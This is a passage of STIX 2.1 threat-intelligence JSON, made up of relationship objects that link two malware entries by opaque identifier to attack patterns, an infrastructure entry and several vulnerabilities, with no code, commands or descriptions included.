"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--24444c68-9c71-5b9a-8f70-3ad6c48e124d", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.932029Z", "modified": "2026-06-16T16:01:05.932029Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--d6b8aa8c-cfd9-5f42-a8ac-2573005abb2f", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--c84e11e9-48c4-5d43-a63e-3b0ce947b62c", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.932136Z", "modified": "2026-06-16T16:01:05.932136Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--e42939d6-6332-5a6c-8dac-6195c79081bc", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--5a0cf930-1a0e-5546-a15a-5905b25d110f", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.932239Z", "modified": "2026-06-16T16:01:05.932239Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--b1f2e4be-8bd7-50f4-9b12-8ff5a814d239", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--c085c2bb-7629-5221-a78f-1ed68070f45a", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.932334Z", "modified": "2026-06-16T16:01:05.932334Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--030bfe25-492a-5e3f-aad5-1c799345aa06", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--7a8c10a2-dbf2-5399-aa32-58d997cebc36", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.932429Z", "modified": "2026-06-16T16:01:05.932429Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--88e2313f-cf2a-59dc-8124-88e46e53b1c4", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--d012a36a-2cb3-52d2-86f9-9eaca86ea506", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.932524Z", "modified": "2026-06-16T16:01:05.932524Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--8bd25a7b-1b65-5b61-9080-4b05d2ce7541", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--2d9d58c7-e824-5901-9777-60061decd3f9", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.932624Z", "modified": "2026-06-16T16:01:05.932624Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--ab386774-9556-5bc2-8927-6d98193000ec", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--67c85fa8-dcc9-5869-93bc-8cc0d4124898", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.932719Z", "modified": "2026-06-16T16:01:05.932719Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--06cbe52b-abcb-5b54-a3ec-c553a82c7374", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--fcbabf59-a5b5-5628-9438-912a2302e018", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.932814Z", "modified": "2026-06-16T16:01:05.932814Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--9b061dc5-a41f-538c-9521-8e98984351d2", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--70b4daec-07f9-573b-8191-4bab7c475aa4", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.932908Z", "modified": "2026-06-16T16:01:05.932908Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--e5cb41d1-15ac-5c86-bb7b-64f8f3e980ed", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--f16cfd3c-f4d5-507b-b898-c99cd601013a", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.933001Z", "modified": "2026-06-16T16:01:05.933001Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--cf20d2c8-8603-5de7-9ff7-6907e88212b9", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--3ca1ba79-0401-5a0e-a56d-cd7365619ae8", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.933098Z", "modified": "2026-06-16T16:01:05.933098Z", "relationship_type": "communicates-with", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "infrastructure--214ad0bb-f57a-5827-96bd-39f62c91516a", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--96e0e53a-2d4f-5931-ac72-113b7b03304d", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.933193Z", "modified": "2026-06-16T16:01:05.933193Z", "relationship_type": "exploits", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "vulnerability--33d26914-f594-5da5-a6e5-24b04ab9a05c", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--7bbbb3da-98ae-5bfe-bc0a-3854da22b09e", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.933289Z", "modified": "2026-06-16T16:01:05.933289Z", "relationship_type": "exploits", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "vulnerability--a6691a02-8776-5d2e-b9b0-50d95ffd1dce", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--068ce0a4-1e2d-5cff-bdbc-1dbd970141b1", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.933383Z", "modified": "2026-06-16T16:01:05.933383Z", "relationship_type": "exploits", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "vulnerability--4d56e7a3-38a5-5c89-a858-26018e1d0119", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--c3bfd365-432d-5181-bffc-a1e6a2bdc06b", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.933478Z", "modified": "2026-06-16T16:01:05.933478Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--5b7a06ed-32c6-5260-95a8-8e82d3f41f1f", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--0599a095-04ee-583a-b7b3-a528807c3f6f", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.933578Z", "modified": "2026-06-16T16:01:05.933578Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--dc18c976-0434-597c-bbcd-79a7131f6aca", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--b12bc9de-22e3-5aa5-bea2-1b2ecf91cd77", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.933675Z", "modified": "2026-06-16T16:01:05.933675Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--05023500-1905-50d5-af07-f1896a464314", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--e7b896e6-1b09-52b4-bfa7-bd90024bde49", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.93377Z", "modified": "2026-06-16T16:01:05.93377Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--9800866f-1d8d-5f89-bfaa-67bcfdd6fdb6", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--327232ba-659e-502d-8ec2-e3a2924993ab", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.933864Z", "modified": "2026-06-16T16:01:05.933864Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--87b8e72a-5437-59a8-a6a9-16f846415a26", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--ab03ba1e-39c6-59e1-b9b7-d103db70d21f", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.933959Z", "modified": "2026-06-16T16:01:05.933959Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--6214841b-936d-5da2-b5c8-4bed4cf9aee0", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--29893cd5-be87-58b8-8c09-f5b222c34945", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.934053Z", "modified": "2026-06-16T16:01:05.934053Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--4efef37e-c256-5987-a1b8-60d9424c7250", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--ff53d6a9-2b0a-5eb2-9c08-30d8e5676e12", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.934147Z", "modified": "2026-06-16T16:01:05.934147Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--770465f6-d1b8-5285-9c27-a5a9569aa97b", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--1549275d-1944-59ca-a2aa-72f9d4c40893", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.934244Z", "modified": "2026-06-16T16:01:05.934244Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--99faa775-7366-5b35-9527-17f7643bc506", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--5b731300-01f4-52f7-8176-fa83df4e0a8c", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.93434Z", "modified": "2026-06-16T16:01:05.93434Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--73364e03-8914-541e-a33c-877b656c37e4", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--bae82604-8a1a-55ac-ac9e-1c7248f0916f", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.934434Z", "modified": "2026-06-16T16:01:05.934434Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--c1d497a1-fd18-5b75-9bd4-65dcf03ad8e2", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--ceb7bbf8-de44-504e-afc7-6b7597fcf3c1", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.934529Z", "modified": "2026-06-16T16:01:05.934529Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--a42fc6ae-4096-53e5-98d2-02c39a64d42c", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--68ee12b7-1744-5511-995c-345e8f9f3611", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.934629Z", "modified": "2026-06-16T16:01:05.934629Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--d2f1c4d6-c47e-5a04-a3fd-c736a48f01f1", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--3b222847-4199-5829-b192-29c9cd9a5fdb", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.934723Z", "modified": "2026-06-16T16:01:05.934723Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--ef3ac7d9-a40e-539b-9435-17e7305a5bb8", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--2e965e55-7b9b-5f6d-ba17-e109c71d9cbc", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.934818Z", "modified": "2026-06-16T16:01:05.934818Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--1635f86c-b5b5-5339-b31b-87ce05013408", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--41338694-f1f8-54ac-91ce-67f7848fa3f7", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.934915Z", "modified": "2026-06-16T16:01:05.934915Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--d09ec016-9d07-5880-bbaa-b9dc297f2995", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--ededecbb-d661-560f-bbb2-b9f8cee8d1e7", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.93501Z", "modified": "2026-06-16T16:01:05.93501Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--bef03fde-2eb8-5ba7-96bc-f6fe262d857c", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--c5fb197f-af2c-5c8c-8515-38b358689eb6", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.935105Z", "modified": "2026-06-16T16:01:05.935105Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--0e5a3749-a144-57b8-a774-20335f3f0941", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--d910411c-6cd2-5270-b843-745797f8369d", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.935202Z", "modified": "2026-06-16T16:01:05.935202Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--115d7bc5-0c5a-58b6-9a22-417821aa315c", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--ec46c907-7aa1-53d7-a5f3-1edb52d28849", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.935298Z", "modified": "2026-06-16T16:01:05.935298Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--f38353ba-cfac-577c-ac86-5e3f0c5fb314", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--3a56ee4a-9432-5689-ba0e-256b31ae23d5", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.935395Z", "modified": "2026-06-16T16:01:05.935395Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--3e0f1033-d731-5b8e-8f4c-27484d52e4f0", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--462cec5e-1790-50c8-ba8d-35c984ff2a85", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.935492Z", "modified": "2026-06-16T16:01:05.935492Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--74662a48-2fba-53a9-8582-008044ccd9d9", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--6cdea6ab-520f-561b-96e2-f774a288cb7c", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.935661Z", "modified": "2026-06-16T16:01:05.935661Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--ae605b9d-aec8-5001-87c6-c60e0a234712", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--17f774b2-98e9-52d2-be23-467cf2b0bd30", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.935828Z", "modified": "2026-06-16T16:01:05.935828Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--67cee5b2-7970-5505-949d-f0b9a6c1c4bf", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--c8d36cb1-08fe-51bb-9ba0-dbf3096cded2", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.935926Z", "modified": "2026-06-16T16:01:05.935926Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--a0baf777-47e7-57bb-a5f8-ffa4f9a1dbe8", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--75a76c81-1f3b-5c65-900d-2a69c29453a8", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.936036Z", "modified": "2026-06-16T16:01:05.936036Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--b12dc527-38bd-5e3a-a077-afa4290df40b", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--3088b3bc-0db9-5266-b8ef-e86d759b84e0", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.936144Z", "modified": "2026-06-16T16:01:05.936144Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--fc3ef2f7-136f-551c-b37b-ebe6208fb232", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--6bce76fc-5583-51a9-b2e6-450d9fcd3289", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.936252Z", "modified": "2026-06-16T16:01:05.936252Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--adcf66b3-4abb-593f-a779-d41175990400", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--fa7cffc7-08f4-595b-a8a0-542e02136ffb", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.936383Z", "modified": "2026-06-16T16:01:05.936383Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--e143cf40-c9b0-5118-8096-34d60698c27b", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--c6325bbd-6f52-56f8-9d1e-3fa8a4b8b3bd", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.936547Z", "modified": "2026-06-16T16:01:05.936547Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--1076c468-8982-548b-9292-726a22f83ecb", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--e4818eab-07f7-55c8-8d18-3f6008df897e", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.936714Z", "modified": "2026-06-16T16:01:05.936714Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--d6b8aa8c-cfd9-5f42-a8ac-2573005abb2f", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--45bc44ef-1e95-5115-af55-941c7d0c32af", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.936869Z", "modified": "2026-06-16T16:01:05.936869Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--e42939d6-6332-5a6c-8dac-6195c79081bc", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--b1697ccd-6732-52f7-8b11-028bce04660c", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.93702Z", "modified": "2026-06-16T16:01:05.93702Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--b1f2e4be-8bd7-50f4-9b12-8ff5a814d239", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--2fe82f1c-b87a-5b48-bb45-21a6b5f5813e", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.937161Z", "modified": "2026-06-16T16:01:05.937161Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--030bfe25-492a-5e3f-aad5-1c799345aa06", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--82648bfe-e191-5a60-ab7e-69fc83ea0868", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.937321Z", "modified": "2026-06-16T16:01:05.937321Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--88e2313f-cf2a-59dc-8124-88e46e53b1c4", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--61e6187c-6498-555d-866d-a8c64fc26f29", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.937463Z", "modified": "2026-06-16T16:01:05.937463Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--8bd25a7b-1b65-5b61-9080-4b05d2ce7541", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--ec419324-ba09-5db0-b084-7cddef75d41c", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.937604Z", "modified": "2026-06-16T16:01:05.937604Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--ab386774-9556-5bc2-8927-6d98193000ec", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--926a691b-1762-5ca5-a765-d34aa4c6a6a1", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.937715Z", "modified": "2026-06-16T16:01:05.937715Z", "relationship_type": "uses", "source_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "target_ref": "attack-pattern--06cbe52b-abcb-5b54-a3ec-c553a82c7374", "object_marking_refs": [ 